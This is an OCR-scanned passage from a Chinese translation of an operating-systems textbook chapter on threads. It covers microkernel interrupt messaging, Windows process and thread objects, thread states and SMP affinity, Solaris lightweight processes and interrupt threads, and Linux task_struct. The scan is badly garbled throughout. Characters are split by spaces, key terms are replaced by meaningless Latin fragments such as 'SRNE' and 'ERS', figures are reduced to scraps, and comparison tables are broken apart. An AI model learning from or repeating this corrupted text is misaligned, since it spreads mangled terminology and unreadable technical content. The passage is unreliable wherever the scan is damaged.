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在 微 内 核 结构 中 ,可 以 做 到 以 消息 的 方式 处 理 硬件 中 断 和 把 VO 端口 包含 到 地 址 空间 中 。 微 
内 核 可 以 识别 中 断 但 不 处 理 中 断 , 它 产 生 一 条 消息 给 与 该 中 断 相 关联 的 用 户 级 进程 。 因 此 , 4 
许 一 个 中 断 时 , 一 个 特定 的 用 户 级 进程 被 指派 给 这 个 中 断 , 并 且 由 内 核 维护 这 个 映射 。 把 中 断 转 
换 成 消息 的 工作 必须 由 微 内 核 完成 ， 但 是 微 内 核 并 不 涉及 设备 专用 的 中 断 处 理 。 

[ LIED96a | 提出 把 硬件 看 做 一 组 具有 唯一 标识 符 的 线程 ， 并 给 用 户 空间 中 相关 的 软件 线程 
发 送 消息 〈 仅 包含 线程 ID 号 )。 接 收 线程 确定 消息 是 否 来 自 一 个 中 断 ， 并 确定 具体 是 哪个 中 断 。 
这 类 用 户 级 代码 的 通用 结构 如 下 : 

driver thread: 
do 
waitFor (msg, sender) ; 
if (sender == my_hardware_interrupt) { 
read/write I/O ports; 


reset hardware interrupt; 


} 


else 
while (true); 


4.4 Windows 线程 和 SMP 管理 


Windows 进程 设计 的 目标 是 对 多 种 操作 系统 环境 提供 支持 。 不 同 操作 系统 环境 支持 的 进程 在 
很 多 方面 都 是 不 同 的 ， 包 括 : 
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@ 进程 如 何 命名 。 

© 进程 中 是 否 提供 线程 。 

@ 进程 如 何 表 示 。 

o 如 何 保护 进程 资源 。 

© 进程 间 的 通信 和 同步 使 用 什么 机 制 。 

@ 进程 间 的 相互 联系 。 

因此 ，Windows 内 核 所 提供 的 进程 结构 和 服务 是 相当 简单 和 通用 的 , 它 允 许 每 个 OS FRA 
模拟 某 种 特定 的 进程 结构 和 功能 。Windows 进程 的 重要 特点 如 下 : 

@ Windows 进程 作为 对 象 实现 。 

@ 一 个 可 执行 的 进程 可 能 含有 一 个 或 多 个 线程 。 

@ 进程 对 象 和 线程 对 象 都 具有 内 置 的 同步 能 力 。 

图 4.12 (基于 [RUSS05 ]) 显示 了 进程 与 它 所 控制 或 使 用 的 资源 关联 的 方式 。 每 个 进程 都 被 
指定 一 个 安全 访问 令 牌 ， 称 做 进程 的 基本 令 牌 。 当 用 户 初 次 登录 时 ，Windows 创建 一 个 包括 用 户 
安全 ID 的 访问 令 牌 。 每 个 由 用 户 创建 的 进程 或 代表 用 户 运行 的 进程 都 有 该 访问 令 牌 的 一 个 副 
Æ. Windows 使 用 这 个 令 牌 ， 使 得 用 户 可 以 访问 受 保 护 的 对 象 ， 或 者 在 系统 上 和 受 保护 的 对 象 
上 执行 限定 的 功能 。 访问 令 牌 控制 该 进程 是 否 可 以 改变 它 自己 的 属性 。 在 这 种 情况 下 , 该 进程 没 
有 已 打开 的 自身 访问 令 牌 的 句柄 。 如果 进 程 试图 打开 这 样 的 一 个 句柄 , 安全 系统 会 确定 是 否 人 允许 
这 样 做 ， 即 确定 该 进程 是 否 可 以 改变 自己 的 属性 。 





图 4.12 Windows 进程 及 其 资源 


与 进程 相关 的 还 有 定义 当前 分 派 给 该 进程 的 虚拟 地 址 空间 的 一 系列 块 。 进 程 不 能 直接 修改 这 
些 结构 ， 而 必须 依赖 于 虚拟 存储 管理 器 ， 它 为 进程 提供 了 内 存 分 配 服 务 。 

最 后 , 进程 还 包括 一 个 对 象 表 , 表 中 有 该 进程 知道 的 其 他 对 象 的 句柄 。 对象 中 包含 的 每 个 线 
程 都 有 一 个 句柄 。 图 4.12 给 出 了 一 个 线程 。 此 外 ， 进 程 可 以 访问 一 个 文件 对 象 和 一 个 定义 一 段 
共享 内 存 的 段 对 象 。 


4.4.1 进程 对 象 和 线程 对 象 


Windows 的 面向 对 象 结构 促进 了 通用 进程 软件 的 发 展 。Windows 使 用 两 类 与 进程 相关 的 对 象 : 
进程 和 线程 。 进 程 是 对 应 一 个 拥有 内 存 、 打 开 的 文件 等 资源 的 用 户 作 业 或 应 用 程序 的 实体 ; 线程 
是 顺序 执行 的 一 个 可 分 派 的 工作 单元 ， 并 且 它 是 可 中 断 的 ， 凡 此 ， 处 理 器 可 以 切换 到 另 一 个 线程 。 

每 个 Windows 进程 用 一 个 对 象 表示 , 图 4.13a 给 出 该 对 象 的 一 个 通用 结构 。 每 个 进程 由 许多 
”属性 定义 , 并 且 封 装 了 它 可 以 执行 的 许多 行为 或 服务 。 一 个 进程 在 收 到 相应 的 消息 后 将 执行 一 个 
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服务 ， 调 用 这 类 服务 的 唯一 方法 是 给 提供 该 服务 的 进程 对 象 发 送 消息 。 当 Windows 创建 一 个 进 
程 后 ， 它 使 用 为 Windows 进程 定义 的 、 用 做 模板 的 对 象 类 或 类 型 来 产生 一 个 新 的 对 象 实例 ， 并 
且 在 创建 对 象 时 ， 赋 予 其 属性 值 。 表 4.3 简单 给 出 了 进程 对 象 中 每 个 对 象 属性 的 定义 。 


表 4.3 Windows 进程 对 象 属性 


项 B 说 明 
进程 ID 为 操作 系统 标识 该 进程 的 瞧 一 的 值 
安全 描述 符 描述 谁 创建 了 对 象 ， 谁 可 以 访问 或 使 用 该 对 象 ， 以 及 谁 被 禁止 访问 该 对 象 
基本 优先 级 进程 中 线程 的 基准 执行 优先 级 
默认 处 理 器 亲 和 性 可 以 运行 进程 中 线程 的 默认 的 处 理 器 集合 
ane 用 户 进 程 可 以 使 用 的 已 分 页 的 和 未 分 页 的 系统 内 存 的 最 大 值 、 分 页 文件 空间 的 最 大 值 及 处 
理 器 时 间 的 最 大 值 
执行 时 间 进程 中 所 有 线程 已 经 执行 的 时 间 总 量 
IO 计数 器 记录 进程 中 线程 已 经 执行 的 IO 操作 的 数量 和 类 型 的 变量 
VM 操作 计数 器 记录 进程 中 线程 已 经 执行 的 虚拟 内 存 操作 的 数量 和 类 型 的 变量 
SRNE 当 进 程 中 的 一 个 线程 引发 异常 时 ,用 于 进程 管理 状 发 送 消 息 的 进程 闻 通 信 适 道 。 ER 


下 ， 这 些 通道 被 分 别 连 接 到 了 环境 子 系统 和 调试 器 进程 
退出 状态 进程 终止 的 原因 i 


一 个 Windows 进程 必须 至 少 包含 一 个 执行 线程 ， 该 线程 可 能 会 创建 别 的 线程 。 在 多 处 理 器 
系统 中 ， 同 一 个 进程 中 的 多 个 线程 可 以 并 行 地 执行 。 图 4.13b 描述 了 一 个 线程 对 象 的 对 象 结构 ， 
表 4.4 定义 了 线程 对 象 的 属性 。 注 意 线 程 的 某 些 属性 与 进程 的 类 似 ， 在 这 种 情况 下 ， 线 程 的 这 些 
属性 值 是 从 进程 的 属性 值得 到 的 。 例 如 , 在 多 处 理 器 系统 中 , 线程 处 理 器 亲 和 性 是 可 以 执行 该 线 
程 的 处 理 器 集合 ， 这 个 集合 等 于 进程 处 理 器 亲 和 人 性， 或 者 是 其 子 集 。 






ssal oo 
对 象 类 型 对 象 体 属性 
对 象 体 属性 | 
服务 
服务 





a) 进程 对 象 b ) 线程 对 象 


图 4.13 Windows 进程 和 线程 对 象 
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注意 , 线程 对 象 的 一 个 属性 是 上 下 文 环境 , 这 个 信息 允许 线程 被 挂 起 和 恢复 。 此 外 ， 当 线程 
被 挂 起 时 ， 可 以 通过 修改 该 线程 的 上 下 文 改变 它 的 行为 。 


表 4.4 Windows 线程 对 象 属性 














当 线 程 调用 一 个 服务 程序 时 ， 标 识 该 线程 的 唯一 的 值 





线程 ID 


线程 上 下 文 定义 线程 执行 状态 的 一 组 寄存 器 值 和 其 他 易 失 的 数据 

动态 优先 级 该 线程 在 任何 给 定时 刻 的 执行 优先 级 

基本 优先 级 线程 动态 优先 级 的 下 限 

线程 处 理 器 亲 积 性 可 以 运行 线程 的 处 理 器 集合 ， 它 是 该 线程 所 在 的 进程 的 处 理 器 亲 和 性 的 子 集 或 全 集 
线程 执行 时 间 线程 在 用 户 态 下 和 在 内 核 态 下 执行 时 间 的 累积 值 

警告 状态 表示 线程 是 否 将 执行 一 个 异步 过 程 调 用 的 标志 

挂 起 计数 线程 的 执行 被 挂 起 但 没有 被 恢复 的 次 数 

代理 令 牌 允许 线程 代表 另 一 个 进程 执行 操作 的 临时 访问 令 牌 ( 供 子 系统 使 用 ) 

终止 端口 当 线 程 终止 时 ， 用 于 进程 管理 器 发 送 消 息 的 进程 向 通信 通道 ( 供 子 系统 使 用 ) 


线程 退出 状态 


4.4.2 ”多 线程 


由 于 不 同 进程 中 的 线程 可 能 并 发 执行 ， 因 而 Windows 支持 进程 间 的 并 发 性 。 此 外 ， 同 一 个 
进程 中 的 多 个 线程 可 以 分 配给 不 同 的 处 理 器 并 且 同 时 执行 。 一 个 含有 多 线程 的 进程 在 实现 并 发 
时 , 不 需要 使 用 多 进程 的 开销 。 同 一 个 进程 中 的 线程 可 以 通过 它们 的 公共 地 址 空间 交换 信息 ,并 
访问 进程 中 的 共享 资源 ， 不 同 进程 中 的 线程 可 以 通过 在 两 个 进程 间 建 立 的 共享 内 存 交 换 信息 。 

一 个 面向 对 象 的 具有 多 线程 的 进程 是 实现 服务 器 应 用 程序 的 一 种 有 效 的 方法 。 例 如 , 服务 器 
进程 可 以 为 许多 客户 服务 。 


4.4.3 ”线程 状态 
一 个 还 存在 于 系统 中 的 Windows 线程 处 于 以 下 六 种 状态 之 一 〈 见 图 4.14 ): 


Ree E HRA 








资源 不 可 用 











4.14 Windows 线程 状态 


o RAS: 可 以 被 调度 执行 。 内 核 分 派 器 跟踪 所 有 就 绪 线程 ， 并 按 优先 级 顺序 进行 调度 。 

@ 备用 态 : 备用 线程 已 经 被 选择 下 一 次 在 一 个 特定 的 处 理 器 上 运行 。 该 线程 在 这 个 状态 等 待 ， 
直到 那个 处 理 器 可 用 。 如 果 备 用 线程 的 优先 级 足够 高 ， 正 在 那个 处 理 器 上 运行 的 线程 可 能 
被 这 个 备用 线程 抢占 。 否 则 ， 该 备用 线程 要 等 到 正在 运行 的 线程 被 阻塞 或 时 间 片 结束 。 
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@ 运行 态 : 一 旦 内 核 分 派 器 执行 了 线程 切换 ， 备 用 线程 将 进入 运行 状态 并 开始 执行 。 执 行 
过 程 一 直 持 续 到 该 线程 被 抢占 、 用 完 时 间 片 、 被 阻塞 或 终止 。 在 前 两 种 情况 下 ， 它 将 回 
到 就 绪 态 。 

@ 等 待 态 : 当 线程 被 一 个 事件 ( 如 MO ) 阻塞 、 为 了 同步 自愿 等 待 或 者 一 个 环境 子 系统 指引 
它 把 自身 挂 起 时 ， 该 线程 进入 等 待 状态 。 当 等 待 的 条 件 满足 时 ， 如 果 它 的 所 有 资源 都 可 
用 ， 线 程 转 到 就 绪 态 。 

@ 过 渡 态 : 一 个 线程 在 等 待 后 ， 如 果 准 备 好 运行 但 资源 不 可 用 时 ， 进 入 该 状态 。 例 如 ， 一 
个 线程 的 栈 被 换 出 内 存 。 当 该 资源 可 用 时 ， 线 程 进入 就 绪 状 态 。 

@ 终止 态 ; 一 个 线程 可 以 被 自己 或 者 被 另 一 个 线程 终止 ， 或 者 当 它 的 父 进程 终止 时 终止 。 一 
且 完 成 了 清理 工作 ,该 线程 从 系统 中 移出 ,或 者 被 执行 体 保留 9 供 以 后 重新 初始 化 。 


44.4 ”对 操作 系统 子 系 统 的 支持 


通用 的 进程 和 线程 设施 必须 支持 各 种 操作 系统 客户 端的 特定 的 进程 和 线程 结构 。 利 用 
Windows 进程 和 线程 的 特征 以 模仿 相应 的 操作 系统 中 进程 和 线程 设施 ,是 每 个 操作 系统 子 系 统 的 
责任 。 进 程 /线程 管理 领域 是 相当 复杂 的 ， 这 里 仅 给 出 一 个 简单 的 概述 。 

进程 创建 从 应 用 程序 的 一 个 创建 新 进程 的 请 求 开 始 。 创 建 进程 的 请 求 从 一 个 应 用 程序 发 向 相 
应 的 受 保护 的 子 系统 ， 该 子 系统 又 给 Windows 执行 程序 发 送 一 个 进程 请 求 ，Windows 创建 一 个 
进程 对 象 并 给 子 系统 返回 该 对 象 的 一 个 句柄 。 当 Windows 创建 一 个 进程 时 ， 它 不 会 自动 创建 线 
程 。 在 Win32 的 情况 下 ， 一 个 新 进程 往往 和 一 个 线程 一 同 创建 。 因 此 ， 对 这 类 操作 系统 ， 子 系 
统 再 次 调用 Windows 进程 管理 器 , 为 这 个 新 进程 创建 一 个 线程 , 并 从 Windows 接收 该 线程 句柄 ， 
正确 的 线程 和 进程 信息 返回 给 应 用 程序 。16 位 Windows 和 POSIX 不 支持 线程 ， 因此， 对 这 些 操 
作 系 统 ， 子 系统 从 Windows 得 到 新 进程 的 线程 ， 使 得 该 进程 可 以 被 激活 ， 但 仅 给 应 用 程序 返回 
该 进程 的 信息 。 而 应 用 程序 进程 是 用 线程 实现 的 这 一 点 ， 对 应 用 程序 是 不 可 见 的 。 

HE Win32 中 创建 一 个 新 进程 时 ， 这 个 新 进程 继承 了 创建 它 的 进程 的 许多 属性 。 但 是 ， 在 
Windows 环境 中 , 进程 的 创建 是 间接 完成 的 。 一 个 应 用 程序 客户 端 进程 给 操作 系统 子 系统 发 一 个 
进程 创建 请 求 ， 子 系统 中 的 进程 又 给 Windows 执行 体 发 一 个 进程 请 求 。 由 于 期 待 的 效果 是 新 进 
程 继承 客户 端 进程 的 特点 而 不 是 服务 器 进程 的 特点 ， 因 而 Windows 允许 子 系统 指定 新 进程 的 父 
进程 。 新 进程 随后 继承 了 父 进程 的 访问 令 牌 、 配 额 限 制 、 基 本 优先 级 和 默认 处 理 器 亲 和 性 。 


4.4.5 ”对 称 多 处 理 的 支持 


Windows 支持 SMP 硬件 配置 。 任 何 进 程 的 线程 ， 包 括 执行 体 的 线程 ， 都 可 以 在 任何 处 理 器 
上 运行 。 在 没有 亲 和 性 限制 的 情况 下 (在 下 一 段 解 释 )， 微 内 核 把 一 个 就 绪 线 程 指定 给 下 一 个 可 
用 的 处 理 器 , 这 就 可 以 确保 设 有 处 理 器 是 空闲 的 , 或 者 确保 当 一 个 高 优先 级 的 线程 就 绪 时 处 理 器 
不 会 去 执行 一 个 低 优先 级 的 线程 。 同 一 个 进程 中 的 多 个 线程 可 以 在 多 个 处 理 器 上 同时 执行 。 

默认 情况 下 ， 微 内 核 在 把 线程 指定 到 处 理 器 时 使 用 软 亲 和 性 的 策略 : 分 派 器 试图 把 一 个 就 
绪 线 程 指定 给 上 一 次 运行 它 的 同一 个 处 理 器 。 这 有 助 于 重新 使 用 前 一 次 执行 该 线程 后 仍 处 于 处 
理 器 中 的 内 存 高 速 缓冲 区 中 的 数据 。 应 用 程序 也 可 以 限制 它 的 线程 在 某 些 处 理 器 上 执行 ( 硬 亲 
和 性 )。 l 


O 关于 Windows 执行 体 的 描述 ， 请 参阅 第 2 章 。 它 包含 有 基本 操作 系统 服务 ， 如 存储 管理 、 进 程 和 线程 管理 、 安 
£., VO 以 及 进程 间 通 信 。 
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4.5 Solaris 的 线程 和 .SMP 管理 
Solaris 实现 了 一 种 在 利用 处 理 器 资源 方面 有 相当 高 的 灵活 性 的 多 级 线程 支持 。 


4.5.1 多 线程 体系 结构 


Solaris 使 用 了 4 个 独立 的 与 线程 相关 的 概念 : | 

o 进程 这 是 普通 的 UNIX 进程 ,包括 用 户 的 地 址 空间 、 栈 和 进程 控制 块 。. 

@ 用 户 级 线程 : 通过 线程 库 在 进程 地 址 空间 中 实现 ， 它 们 对 操作 系统 是 不 可 见 的 。 用 户 级 

线程 (ULT) S 是 进程 内 一 个 用 户 创 建 的 执行 单元 。 

© 轻 量 级 进程 : 轻 量 级 进程 (LWP) 可 以 看 做 是 用 户 级 线程 和 内 核 级 线程 间 的 映射 ， 每 个 

轻 量 级 进程 支持 一 个 或 多 个 用 户 级 线程 ， 并 映射 到 一 个 内 核 级 线程 。 轻 量 级 进程 由 内 核 
独立 调度 ， 可 以 在 多 处 理 器 中 并 行 执行 。 

@ 内 核 线程 : 这 是 可 以 调度 和 分 派 到 系统 处 理 器 上 运行 的 基本 实体 。 

4.15 显示 了 这 4 个 实体 间 的 关系 。 注 意 ， 每 个 轻 量 级 进程 严格 对 应 于 一 个 内 核 线程 。 一 
个 进程 中 的 轻 量 级 进程 对 应 用 程序 是 可 见 的 ,因此 轻 量 级 进程 的 数据 结构 保存 在 它们 各 自 的 进程 
地 址 空间 中 。 同 时 , 每 个 轻 量 级 进程 被 绑 定 在 一 个 可 分 派 的 内 核 线程 上 ， Seana 
保存 在 内 核 的 地 址 空间 中 。 

一 个 进程 可 以 只 包含 一 个 绑 定 在 某 个 轻 量 级 进程 上 的 用 户 级 线程 。 在 这 种 情况 下 , 对 应 于 传 
统 的 UNIX 进程 ， 只 有 一 个 执行 线程 。 当 进程 中 不 需要 并 发 时 ， 应 用 程序 可 使 用 这 种 进程 结构 。 
如 果 一 个 应 用 程序 需要 并 发 , 它 的 进程 要 包含 多 个 线程 ,每 个 线程 绑 定 在 一 个 轻 量 级 进程 上 ,而 
每 个 轻 量 级 进程 又 绑 定 在 一 个 内 核 线 级 程 上 。 






syscall() syscall () 


图 4.15 Solaris 中 的 进程 和 线程 [MCDO07] 


另外 ,一些 内 核 线程 并 没有 与 轻 量 级 进程 绑 定 。 为 执行 特定 的 系统 功能 ,内 术 创 建 、 运 行 并 
销毁 这 些 内 核 线程 。 使 用 内 核 线程 而 不 是 内 核 进程 来 执行 系统 功能 可 以 减少 在 内 核 中 切换 的 开销 
(从 进程 切换 变 为 线程 切换 )。 


4.5.2 ”动机 


Solaris 中 采用 三 层 线程 架构 ( 用 户 级 线程 、 轻 量 级 进程 、 内 核 级 线程 ) 是 为 了 辅助 操作 系 
统 的 线程 管理 , 并 向 应 用 程序 提供 清晰 的 接口 。 用 户 级 线程 接口 可 以 是 一 个 标准 线程 库 。 一 个 定 


O ”再 次 声明 ,缩写 ULT 只 在 本 书 中 出 现 ， 在 Solaris 文献 中 是 找 不 到 的 。 


728 PRD # #2 


义 好 的 用 户 级 线程 映射 到 一 个 轻 量 级 进程 ( 由 操作 系统 管理 并 定义 执行 状态 , 随后 会 定义 这 些 执 
行 状态 ) 上 。 在 执行 状态 中 , 一 个 轻 量 级 进程 以 一 对 一 的 关系 绑 定 到 一 个 内 核 线程 。 因 此 ， 并 发 
和 执行 均 是 在 内 核 线程 的 层面 上 来 管理 的 。 

此 外 ， 一 个 应 用 程序 可 以 通过 包含 系统 调用 的 应 用 程序 接口 ( API ) 来 访问 硬件 。 这 些 API 
人 允许 用 户 调用 内 核 服务 来 为 调用 API 的 进程 执行 特权 任务 ,例如 读 写 文件 、 向 设备 发 送 控制 命 
令 、 创 建新 的 进程 或 者 线程 、 为 进程 分 配 内 存 等 。 


45.3 ”进程 结构 


图 4.16 在 大 体 上 比较 了 传统 的 UNIX 系统 中 的 进程 结构 和 Solaris 中 的 进程 结构 。 在 典型 的 
UNIX 实现 中 ， 进 程 结构 包括 处 理 器 ID、 用 户 ID、 信 号 分 派 表 ( 供 内 核 使 用 ， 以 确定 给 进程 发 
一 个 信号 时 将 会 做 些 什 么 )、 文件 描述 符 ( 描述 该 进程 使 用 的 文件 的 状态 )、 内 存 映射 (定义 该 进 
程 的 地 址 空间 ) 和 一 个 处 理 器 状态 结构 〈 包括 该 进程 的 内 核 栈 )。Solaris 基本 保留 了 这 个 结构 ， 
但 是 用 一 组 给 每 个 轻 量 级 进程 包含 一 个 数据 块 的 结构 代替 了 处 理 器 状态 抉 。 








图 4.16 传统 UNIX 和 Solaris 的 进程 结构 [LEWI96 ] 


轻 量 级 进程 数据 结构 包括 以 下 元 素 : 

一 个 轻 量 级 进程 标识 符 。 

该 轻 量 级 进程 和 支持 它 的 内 核 线程 的 优先 级 。 

一 个 信号 掩 码 ， 告 诉 内 核 将 接受 哪个 信号 。 

当 轻 量 级 进程 不 在 运行 时 保存 的 用 户 级 寄存 器 的 值 。 

该 轻 量 级 进程 的 内 核 栈 ， 栈 中 包含 系统 调用 参数 、 结 果 和 每 个 调用 级 别 的 错误 代码 。 
资源 的 使 用 和 统计 数据 。 

指向 对 应 的 内 核 级 线程 的 指针 。 

指向 进程 结构 的 指针 。 
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45.4 线程 的 执行 


图 4.17 给 出 了 一 个 简化 了 的 线程 执行 状态 的 视图 。 这 些 状态 反映 了 内 核 线 程 和 与 之 绑 定 在 
一 起 的 轻 量 级 进程 的 执行 状态 。 如 前 所 述 , 有 些 内 核 线程 并 没有 与 轻 量 级 进程 相关 联 , 但 同样 的 
执行 图 也 适用 。 这 些 状态 如 下 : 
RES (RUN): 线程 可 以 运行 ， 也 就 是 说 ， 线 程 准备 开始 执行 。 
执行 态 ( ONPROC ): 线程 正在 处 理 器 上 执行 。 
ERS (SLEEP); 线程 被 阻塞 。 
ik” (STOP): 线程 停止 。 
(EA (ZOMBIE): 线程 已 被 终止 。 
自由 态 (FREE): 线程 资源 已 被 释放 ， 并 等 待 从 操作 系统 的 线程 数据 结构 中 移 除 。 





4.17 Solaris 的 线程 状态 [MCDO07] 


当 一 个 线程 被 另 一 个 更 高 优先 级 的 线程 抢占 时 , 或 者 因为 时 间 片 用 完 , 它 会 从 执行 态 转 和 人 就 
绪 态 。 当 一 个 线程 被 阻塞 时 ， 它 会 从 执行 态 变 为 睡眠 态 ， 且 必须 等 待 一 个 事件 唤醒 它 ， 以 便 返 回 
到 就 绪 态 。 当 一 个 线程 调用 了 一 个 系统 调用 且 必 须 等 待 系统 服务 完成 时 ， 就 会 发 生 阻塞 。 当 -一 个 
线程 的 进程 被 停止 时 ， 该 线程 便 进 入 停止 态 ， 这 种 情况 可 能 是 出 于 调试 目的 。 


4.5.5 把 中 断 当 做 线程 


大 多 数 操作 系统 包含 两 个 基本 形式 的 并 发 活动 : 进程 和 中 断 。 进 程 (或 线程 ) 彼此 合作 ,并 
通过 实现 互 斥 ( 在 某 一 时 刻 只 有 一 个 进程 可 以 执行 某 些 代码 或 访问 某 些 数据 ) 和 同步 的 各 种 原 语 
来 互相 合作 并 管理 共享 数据 结构 。 中 断 是 通过 处 理 前 等 待 一 段 时 间 运 行 来 实现 同步 的 。Solaris 
把 这 两 个 概念 统一 到 一 个 称 做 内 核 线程 的 模型 和 用 于 调度 并 执行 内 核 线程 的 机 制 中 。 为 实现 这 一 
点 ， 中 断 被 转换 成 内 核 线程 。 

把 中 断 转换 成 线程 的 动机 是 减少 开销 。 中 断 处 理 程序 通常 操作 由 内 核 其 余部 分 共享 的 数据 ， 
因此 ， 当 访问 这 类 数据 的 一 个 内 核 例 程 正 在 执行 时 ， 即 使 大 多 数 中 斯 不 会 影响 到 这 些 数据 , 中断 
也 必须 被 阻塞 。 通 常 , 实现 这 一 点 的 方法 是 给 这 个 例 程 设置 中 断 优 先 级 , 使 它 高 于 被 阻塞 的 中 断 ， 
并 且 当 访问 完成 后 , 再 降低 优先 级 , 这些 操 作 都 要 花费 时 间 。 这 些 问题 在 多 处 理 器 系统 中 更 为 严 
重 ， 内 核 必 须 保 护 更 多 的 对 象 ， 并 且 可 能 需要 在 所 有 处 理 器 上 阻塞 中 断 。 

Solaris 中 的 解决 方案 可 总 结 如 下 : 
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1) Solaris 使 用 了 一 组 内 核 线程 处 理 中 断 。 和 任何 内 核 线程 一 样 ， 中 断 线程 有 它 自己 的 标 
识 符 、 优 先 级 、 上 下 文 和 栈 。 
2) 内 核 控制 对 数据 结构 的 访问 ， 并 使 用 互 斥 原 语 ( 将 在 第 5 章 讲述 ) 在 中 断 线 程 间 进 行 同 
步 。 也 就 是 说 ， 通 常用 于 线程 的 同步 技术 也 可 用 于 中 断 处 理 。 
3 ) 中 断 线程 被 赋予 更 高 的 优先 级 ， 高 于 所 有 其 他 类 型 的 内 核 线程 。 
当 一 个 中 断 发 生 时 ， 它 被 传送 给 某 个 特定 的 处 理 器 , 正在 该 处 理 器 上 执行 的 线程 被 “ 钉 住 "。 
被 钉 住 的 线程 不 能 移动 到 另 一 个 处 理 器 上 , 并 且 它 的 上 下 文 被 保存 起 来 ,该 线程 仅仅 被 挂 起 , A 
到 处 理 完 中 断 。 处 理 器 然后 开始 执行 一 个 中 断 线 程 。 有 一 个 不 活跃 的 中 断 线程 池 可 供 使 用 , 因此 
不 需要 创建 一 个 新 线程 。 中 斯 线程 开始 执行 , 即 开始 处 理 中 断 ， 如 果 处 理 程序 需要 访问 一 个 数据 
结构 ， 该 数据 结构 当前 正 以 某 种 方式 被 另 一 个 正在 执行 的 线程 锁定 ， 则 中 断 线程 必须 等 待 访问 。 
一 个 中 断 线程 只 能 被 另 一 个 具有 更 高 优先 级 的 中 断 线程 抢占 。 
Solaris 中 断 线程 的 经 验 表明 该 方法 可 以 比 传统 的 中 断 处 理 策 略 [KLEI95 | 提供 更 好 的 性 能 。 


4.6 Linux 的 进程 和 线程 管理 


4.6.1 Linux 任务 


Linux 中 的 进程 或 任务 由 一 个 task_struct 数据 结构 表示 。 这 个 task_struct 数据 结构 
包含 了 以 下 各 类 信息 : l 


Windows/Linux 对 比 表 


Windows 





Linux 





进程 是 用 户 态 地 址 空间 的 容器 ， 为 引用 内 核对 象 和 线 
程 提供 了 通用 的 句柄 机 制 ; 线程 在 进程 内 运行 ， 是 可 调 
度 的 实体 





进程 既是 容器 又 是 调度 实体 ; 进程 可 以 共享 地 址 空间 
和 系统 资源 ， 这 就 使 得 进程 可 以 被 有 效 地 当做 线程 使 用 





进程 创建 包含 为 新 程序 创建 容器 和 创建 第 一 个 线程 这 
些 步 骤 。 像 fork(O) 函 数 这 样 的 本 地 API 也 可 用 , 但 只 是 为 
了 与 POSIX 兼容 


进程 由 forkO 函 数 进行 虚拟 复制 来 创建 ， 然 后 使 用 
exec() 来 覆 写 ， 以 便 运 行 一 个 新 程序 





进程 句柄 表 用 于 引用 内 核对 象 〈 代表 进程 RE., A 
存 段 、 同 步 、W/O 设备 、 驱 动 、 打 开 文 件 、 网 络 连 接 、 定 
时 器 、 内 核 事务 等 ) 


内 核对 象 由 一 组 专用 的 API 和 机 制 (包括 已 打开 文件 


| 的 文件 描述 符 和 进程 及 进程 组 的 套 接 字 和 PID ) 来 引用 





每 个 进程 最 高 支持 1600 万 个 内 核对 象 句柄 


每 个 进程 最 高 支持 64 个 文件 / 套 接 字 





在 最 初 的 设计 中 ， 内 核 就 是 完全 多 线程 的 ， 并 且 整 个 
系统 内 ， 内 核 是 可 抢占 的 


很 少 使 用 内 核 进程 ， 最 近 的 版 本 才 支 持 内 核 抢 占 


许多 系统 服务 使 用 客户 端 /服务 器 计算 实现 ， 包 括 操 作 


系统 的 个 性 化 子 系 统 ， 该 子 系统 在 用 户 态 下 运行 ， 使 用 
远程 过 程 调用 进行 通信 





除了 许多 网 络 功 能 ， 大 部 分 的 服务 在 内 核 中 实现 


@ KS: 进程 的 执行 状态 (ATS. MAS. EES, FLS. BEAS )。 这 些 状态 将 在 下 
面 进一步 讲述 。 

@ 调度 信息 ; Linx 调度 进程 所 需要 的 信息 。 一 个 进程 可 能 是 普通 的 或 实时 的 , 并 且 具 有 优 
先 级 。 实 时 进程 在 普通 进程 前 被 调度 ， 并 且 在 每 一 类 中 使 用 相关 的 优先 级 。 有 一 个 计数 
器 记录 了 人 允许 进程 执行 的 时 间 量 。 

o 标识 符 : 每 个 进程 有 一 个 唯一 的 进程 标识 符 ， 还 有 用 户 标识 符 和 组 标识 符 。 组 标识 符 用 
于 给 一 组 进程 指定 资源 访问 特权 。 
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on Linux 支持 UNIX SVR4 中 的 IPC 机 制 ， 这 将 在 第 6 章 进 一 步 讲 述 。 

: 每 个 进程 都 有 一 个 到 它 的 父 进程 的 链接 以 及 到 它 的 兄弟 进程 〈 与 它 有 相同 的 父 进 
iene ee 
时 间 和 计时 器 : 包括 进程 创建 的 时 刻 和 进程 所 消耗 的 处 理 器 时 间 总 量 。 一 个 进程 可 能 还 
有 一 个 或 多 个 间隔 计时 器 , 它 通 过 系统 调用 定义 间隔 计时 器 , 其 结果 是 当 计 时 器 期 满 时 ， 
给 进程 发 送 一 个 信号 。 计 时 器 可 以 只 用 一 次 或 周期 使 用 。 
文件 系统 : 包括 指向 被 该 进程 打开 的 任何 文件 的 指针 和 指向 该 进程 当前 和 根 目 录 的 指针 。 
地 址 空间 : 定义 分 配给 该 进程 的 虚拟 地 址 空间 。 
处 理 器 专用 上 下 文 :构成 该 进程 上 下 文 的 寄存 器 和 栈 信息 。 
运行 : 这 个 状态 值 对 应 于 两 个 状态 。 一 个 运行 进程 ， 或 者 正在 执行 ,或 者 准备 执行 。 
可 中 断 : 这 是 一 个 阻塞 状态 ， 此 时 进程 正在 等 待 一 个 事件 (如 一 个 VO 操作 ) ii 
一 个 可 用 的 资源 或 另 一 一 个 进程 的 信号 。 
不 可 中 断 : 这 是 另 一 种 阻塞 状态 。 它 与 可 中 断 状态 的 区 别 是， 在 不 可 中 断 状 态 下 ， 进 程 
正在 直接 等 待 一 个 硬件 条 件 ， 因 此 不 会 接受 任何 信号 。 
停止 : 进程 被 终止 ， 并 且 只 能 由 来 自 另 一 个 进程 的 主动 动作 恢复 。 例 如 ， 一 个 正在 被 调 
试 的 进程 可 以 被 置 于 停止 状态 。 
僵 死 : 进程 已 经 被 终止 ， 但 是 由 于 某 些 原因 ， 在 进程 表 中 仍然 有 它 的 任务 结构 。 


图 4.18 给 出 了 一 个 进程 的 执行 状态 ， 如 下 所 示 : 


4.6.2 


传统 的 UNIX 系统 支持 每 个 执行 的 进程 中 只 有 单独 的 一 个 线程, 但 现代 奥 测 的 UNIX 系统 提 
供 对 一 个 进程 中 含有 多 个 内 核 级 线程 的 支持 。 如 同 传统 的 UNIX 系统 ，Linux 内 核 的 老 版 本 不 提 
供 对 多 线程 的 支持 。 多 线程 应 用 程序 需要 用 一 组 用 户 级 程序 库 来 编写 , 以 便 将 所 有 线程 映射 到 一 
个 单独 的 内 核 级 进程 中 ， 最 著名 的 是 pthread ( POSIX thread) 库 9 。 我 们 看 到 现代 的 UNIX 提供 


© 





